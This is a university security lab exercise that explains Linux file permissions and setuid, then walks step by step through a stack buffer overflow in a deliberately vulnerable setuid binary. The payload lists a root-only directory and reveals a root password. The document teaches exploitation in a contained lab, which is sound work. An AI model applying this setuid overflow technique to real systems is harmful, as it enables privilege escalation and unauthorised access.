Setuid Programs

We saw in the last exercise that stack overflows can be used to bypass authentication. Here, the goal is to bypass file system permission checks and list the content of a directory we are not supposed to access. To do so, we are going to exploit a particular type of program that runs with the permissions of the user owning it rather than those of the user executing it: setuid binaries.

Understanding Linux File Permissions

Before we start working with setuid programs, let's explore how Linux file permissions and setuid work.

File Ownership

On a Linux system, every file and directory has 2 different kinds of owners:

User owner (UID) - The account that "owns" the file.
Group owner (GID) - A group of accounts that share certain permissions on the file.

Taking the example of a computer shared between different users, e.g. a lab machine at the University, you have a user account and your personal files in your home folder are set to be accessible only by your account: you cannot access files belonging to other students, and neither can they access your own files. Students also cannot access the files belonging to the system administrator (root). The administrator can assign students to specific groups, for example comp60261, so that file permissions for all users on the course can be set simultaneously.

You can view who owns a file using ls -l. Let's have a look at what this command says when we examine the cp command's binary:

$ ls -l /usr/bin/cp
-rwxr-xr-x 1 root root 151152 Sep 20  2022 /usr/bin/cp

Breaking this down:

-rwxr-xr-x - The first part shows us the type and permission bits
1 - The number of hard links
root - The user owner
root - The group owner
151152 - The file size in bytes
The rest is the modification timestamp and the file/directory name.

Permission Bits

To see what permissions each of the types of users has, we refer to the permission bits. They are displayed as a series of 10 characters. The first letter is the file type: - for a regular file, d for a directory, l for a symbolic link, etc.

Next come the permissions themselves: 3 blocks of 3 characters each. The first block relates to the permissions of the file's owner, the second to the permissions of the file's group, and the third to the permission of all other users not falling within the 2 aforementioned categories.

Each block has 3 characters. The first relates to read permission: the entity concerned by the block can have read access to the file (r) or not (-). The second character denotes write access (w) or not (-). The third denotes execution access (x) or not (-). For a file it means the concerned entity can run it as a program (e.g. with ./file). For a folder it means the entity can enter that folder (e.g. with cd) and access the files inside it; listing the content of a folder requires read permission on it.

So we can see that the file /usr/bin/cp is readable, writable, and executable by its owner root, and can only be read and executed by all other users including other members of the root group.
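The reading of the permission string described above can be sketched in a few lines of Python. This is only an illustration: the function name describe_mode is hypothetical, and the sketch handles the plain r, w and x characters only (not special bits such as s).

```python
def describe_mode(mode: str) -> dict:
    """Split a 10-character `ls -l` mode string into file type and permissions."""
    if len(mode) != 10:
        raise ValueError("expected 10 characters, e.g. '-rwxr-xr-x'")
    file_types = {"-": "regular file", "d": "directory", "l": "symbolic link"}
    result = {"type": file_types.get(mode[0], "other")}
    # Characters 1-3 are the owner's block, 4-6 the group's, 7-9 everyone else's.
    for name, start in (("owner", 1), ("group", 4), ("others", 7)):
        block = mode[start:start + 3]
        result[name] = {
            "read": block[0] == "r",
            "write": block[1] == "w",
            "execute": block[2] == "x",
        }
    return result


if __name__ == "__main__":
    # The mode string shown by ls -l for /usr/bin/cp in the example above.
    for key, value in describe_mode("-rwxr-xr-x").items():
        print(key, value)
```

For the cp example, the owner entry has all three permissions set, while the group and others entries have write set to False.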

Numeric permission notations

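Permissions can also be written as three digits, one per block (owner, group, others). Each digit is the sum of the values of the permissions granted in that block: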

r = 4
w = 2
x = 1

These can be added together to represent a combination of permissions. For example:

rwx = 4 + 2 + 1 = 7
rw- = 4 + 2 = 6
r-x = 4 + 1 = 5
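The same arithmetic can be applied to all three blocks at once. The following is a minimal sketch (the helper name to_octal is hypothetical) that converts nine permission characters into the three-digit notation:

```python
def to_octal(perms: str) -> str:
    """Convert nine permission characters such as 'rwxr-xr-x' to digits such as '755'."""
    if len(perms) != 9:
        raise ValueError("expected 9 characters, e.g. 'rwxr-xr-x'")
    values = {"r": 4, "w": 2, "x": 1, "-": 0}
    digits = []
    # One digit per block: owner, group, others.
    for start in (0, 3, 6):
        block = perms[start:start + 3]
        digits.append(str(sum(values[c] for c in block)))
    return "".join(digits)


if __name__ == "__main__":
    print(to_octal("rwxr-xr-x"))
    print(to_octal("rw-------"))
```

With this sketch, rwxr-xr-x maps to 755 and rw------- maps to 600.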

You can set file permissions numerically with chmod. For example, to create a file containing sensitive data and make it readable and writable by our user only:

$ echo "secret" > file.txt
$ chmod 600 file.txt

Or alternatively using letters:

$ chmod u+x file.txt   # Add(+) the execute(x) permission to the user(u)
$ chmod g-w file.txt   # Remove(-) the write(w) permission from the group(g)

You can also change the owner and group of a file with chown and chgrp:

$ chown emily file.txt        # Change the owner of file.txt to emily
$ chgrp comp60261 file.txt    # Change the group of file.txt to comp60261

`setuid` bit

For certain programs, the x in the owner's block of the permissions is replaced by an s. This is the setuid bit: it indicates that the program will run with the privileges (i.e. file system permissions) of the file's owner instead of those of the user who runs it.

To see an example of this, see the permissions of the /usr/bin/passwd program, which allows users to change their password:

$ ls -l /usr/bin/passwd
-rwsr-xr-x 1 root root 68248 Mar 23  2023 /usr/bin/passwd

This tells us that when the passwd file is executed, it runs with the privileges of its owner, root. This is necessary because the system's passwords are stored in a file that can understandably only be written by root, /etc/shadow. However, non-root users must still be able to change their passwords, i.e. to run passwd. As a result system permissions are set up so that:

/etc/shadow is only accessible by root.
passwd is owned by root and executable by all users.
When passwd executes it actually runs with the permissions of root, hence it can edit /etc/shadow.
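The setuid bit is stored in the file's mode alongside the regular permission bits, as an extra leading digit 4 in numeric notation (e.g. 4755). The sketch below uses Python's standard stat module to test for it; the constant PASSWD_LIKE_MODE is a made-up value mirroring the ls -l output above, not something read from a real file.

```python
import stat

# Hypothetical mode value: regular file, setuid bit set, permissions 755.
PASSWD_LIKE_MODE = stat.S_IFREG | 0o4755


def has_setuid(mode: int) -> bool:
    """Return True if the setuid bit is set in a file mode."""
    return bool(mode & stat.S_ISUID)


if __name__ == "__main__":
    # stat.filemode renders a mode the same way ls -l does.
    print(stat.filemode(PASSWD_LIKE_MODE), has_setuid(PASSWD_LIKE_MODE))
    print(stat.filemode(stat.S_IFREG | 0o755), has_setuid(stat.S_IFREG | 0o755))
```

To inspect a real file, the mode can be obtained with os.stat(path).st_mode.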

Although it is necessary in certain scenarios such as the one we just described, letting users execute programs with root permissions is obviously concerning from a security point of view. This is why you will find only a small number of setuid programs on a standard Linux system.

In this exercise, we will exploit a vulnerability in a setuid program to access, as a non-privileged user, files that are supposed to be accessible only by root.

Exercise Setup

For this exercise you need to run a particular Docker image: olivierpierre/comp60261-setuid. To do so, install the Docker command line engine and run the following in a terminal:

docker run -it olivierpierre/comp60261-setuid

You can then optionally attach vscode to the container. Open a workspace in the folder /home/user/workspace.

Note: this is an x86-64 Docker image, which may not work on an ARM-based MacBook. In that case an alternative is to use GitHub CodeSpaces; the exercise should be doable with the free tier available with GitHub student accounts. To launch a CodeSpace with the exercise's image, click here.

A third option (with Docker installed on an x86-64 machine) is to run this devcontainer. Once vscode has loaded the devcontainer, have it load the proper workspace by bringing up a terminal and entering:

code /home/user/workspace

Our Target Program

The setuid program we aim to exploit is in the workspace folder, named setuid01:

$ ls -l
total 28
drwx------ 1 root root  4096 Aug 20 14:58 private
drwxr-xr-x 1 user user  4096 Aug 20 15:04 public
-rwsr-xr-x 1 root root 14624 Aug 20 14:59 setuid01

There are also 2 folders. The first, named public, is accessible by your user and contains 3 files:

$ ls public/
bread  cake  pasta

These are cooking recipes for various types of meals. The other folder, private, is owned by root and inaccessible to our user:

$ ls private/
ls: cannot open directory 'private/': Permission denied

The goal of the exercise is to list the content of that folder by exploiting the setuid binary.

The binary takes a name as a command line parameter and lists the available recipes, i.e. the files contained in the public directory:

$ ./setuid01 
Usage: ./setuid01 <your name>
$ ./setuid01 pierre
Hello pierre, the recipes available are:
total 12
-rw-r--r-- 1 root root 58 Aug 18 15:00 bread
-rw-r--r-- 1 root root 55 Aug 18 15:00 cake
-rw-r--r-- 1 root root 49 Aug 18 15:00 pasta

This looks very much like the output of ls -l, and it is likely that setuid01 is calling that program under the hood.

Decompiling `setuid01`

Let's decompile that program with RetDec:

retdec-decompiler setuid01
cat setuid01.c

From RetDec's output we can see that the program indeed invokes the ls binary with execlp, which is a libc function to run binaries. The binary to run, and its command line arguments are passed as follows:

int execlp(const char *file, const char *arg0, ..., (char *) NULL);

execlp takes the name of the binary (searched for in the directories listed in $PATH), followed by the list of its arguments. By convention the second parameter (here arg0) is the name of the binary, i.e. the same as the first. For example, to invoke the command cat /home/pierre/test.txt one would call:

execlp("cat", "cat", "/home/pierre/test.txt", NULL);
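Python exposes the same call as os.execlp, which makes it easy to experiment with the argument convention. The sketch below is an illustration only: the helper name run_and_wait is hypothetical, and it forks first because execlp replaces the calling process and never returns on success.

```python
import os


def run_and_wait(*argv: str) -> int:
    """Run argv[0] (looked up in $PATH) with execlp in a child; return its exit status."""
    pid = os.fork()
    if pid == 0:
        # Child: argv[0] is passed twice, once as the file to look up in $PATH
        # and once as the program's own argv[0].
        try:
            os.execlp(argv[0], *argv)
        finally:
            # Only reached if execlp failed (e.g. binary not found).
            os._exit(127)
    # Parent: wait for the child and extract its exit status.
    _, status = os.waitpid(pid, 0)
    return os.WEXITSTATUS(status) if os.WIFEXITED(status) else -1
```

For instance, run_and_wait("cat", "/home/pierre/test.txt") mirrors the C call above, and run_and_wait("ls", "-l", "public") corresponds to a listing of the public folder.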

As one can observe, the list of arguments for the invocation of execlp in RetDec's output seems incomplete: the closing NULL argument is missing, and so is the name of the target folder. Decompilation is not an exact science, and we are hitting one of RetDec's limitations here. Ghidra does a bit better on setuid01 and outputs the following:

bool main(int param_1,undefined8 *param_2) {
  char local_28 [24];
  undefined8 local_10;
  
  local_10 = 0x63696c627570;
  local_28[0] = '\0';
  // ...
  if (param_1 < 2) {
    printf("Usage: %s <your name>\n",*param_2);
  }
  else {
    strcpy(local_28,(char *)param_2[1]);
    printf("Hello %s, the recipes available are:\n");
    execlp("ls","ls",&DAT_00402046,&local_10,0);
  }
  return param_1 < 2;
}

Now we can see the other parameters passed to execlp. Double-clicking on DAT_00402046 in Ghidra will show that it is -l, the first command line parameter passed to ls.

The second command line parameter is local_10. At first glance it looks like an integer with the value 0x63696c627570. However, we know that execlp takes only string parameters, apart from the last one, which is always NULL. We can try to interpret the value of local_10 as a C (ASCII) string, for example with a hexadecimal to ASCII converter. The converter tells us that this value translates to cilbup. Recall that numbers are stored in little-endian order on x86-64, so the bytes sit in memory in the reverse order: the string is public, and it is indeed the last command line parameter passed to ls.
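The conversion can also be done without an online converter. The following sketch (the helper name int_to_c_string is hypothetical) lays the integer out in memory as an 8-byte little-endian value and reads it back as a NUL-terminated C string:

```python
def int_to_c_string(value: int, size: int = 8) -> str:
    """Interpret an integer as it sits in little-endian memory, read as a C string."""
    # Least significant byte first, as on x86-64.
    raw = value.to_bytes(size, byteorder="little")
    # A C string stops at the first NUL byte.
    return raw.split(b"\x00", 1)[0].decode("ascii")


if __name__ == "__main__":
    print(int_to_c_string(0x63696C627570))
```

The two unused high bytes of the 8-byte value are zero, which conveniently provides the NUL terminator after the six characters.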

Now we know that we have a setuid program that lists the content of a folder with root privileges. If we can replace the value of the public string with private, we will reach our goal and list the content of that folder with the permissions of the owner: root. Conveniently, the program makes an unchecked call to strcpy into local_28 from param_2[1], which is actually argv[1]. The buffer local_28 is only 24 bytes long, so a longer argument overflows it. We can use that overflow to overwrite local_10: strcpy writes toward increasing addresses, and because the stack grows down on x86-64, local_10 is likely located at a higher address than local_28, i.e. in the direction of the overflow.

Preparing the Payload

Let's run the program in Pwndbg (available in the Docker image) and use cyclic to check how much padding we need to pass to overflow the string containing public.

$ pwndbg setuid01
# Run the program once to avoid cyclic misbehaving
pwndbg> run
# Generate a cyclic pattern
pwndbg> cyclic 200
# Copy and paste your cyclic pattern and pass it as the command line parameter to setuid01
pwndbg> run aaaaaa # ...
ls: cannot access 'daaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa': No such file or directory
# Now let's see the offset in the pattern for what ls takes as target directory after the overflow:
pwndbg> cyclic -l daaaaaaa
Finding cyclic pattern of 8 bytes: b'daaaaaaa' (hex: 0x6461616161616161)
Found at offset 24

And we have our padding. Note that your pattern may be different, so make sure to pass to cyclic -l the first 8 bytes of the name ls reports it cannot access. Our payload will then be: 24 bytes of padding, followed by the ASCII string "private".
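To see why this payload works, the overflow can be modelled in Python. This is a simplified simulation, not the real stack: it assumes the 24-byte buffer is immediately followed by the 8-byte slot holding public, which is consistent with the offset of 24 measured above (and with Ghidra's names local_28 and local_10, if these are read as stack offsets, since 0x28 - 0x10 = 24). All names in the sketch are hypothetical.

```python
BUF_SIZE = 24   # offset reported by cyclic -l
SLOT_SIZE = 8   # size of the variable holding "public"


def c_string_at(memory: bytearray, offset: int) -> str:
    """Read a NUL-terminated ASCII string starting at offset."""
    end = memory.index(0, offset)
    return memory[offset:end].decode("ascii")


def simulate_strcpy(name: bytes) -> str:
    """Copy name into the modelled buffer like strcpy and return what ls would list."""
    # Zero-filled model of the frame; the extra 16 bytes stand in for the rest of the stack.
    frame = bytearray(BUF_SIZE + SLOT_SIZE + 16)
    frame[BUF_SIZE:BUF_SIZE + 6] = b"public"
    # strcpy copies every byte plus the terminating NUL, with no bounds check.
    data = name + b"\x00"
    frame[0:len(data)] = data
    return c_string_at(frame, BUF_SIZE)


if __name__ == "__main__":
    payload = b"A" * BUF_SIZE + b"private"
    print(simulate_strcpy(b"pierre"))
    print(simulate_strcpy(payload))
```

Note that "private" is 7 characters long, so together with the NUL terminator written by strcpy it fits exactly in the 8-byte slot.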

Launching the Attack

Launch the attack with the aforementioned payload:

$ ./setuid01 AAAAAAAAAAAAAAAAAAAAAAAAprivate

This should display the content of the private folder. It contains a file whose name will give you the root password that you can submit to complete the exercise. To check that this password is correct you can try to log in as root with the su command, or use the web app.

Submission

Fill in the corresponding line in the CSV file on the submission git repository, i.e.:

setuid01,password-here

COMP60261 Lab 2: Memory Safety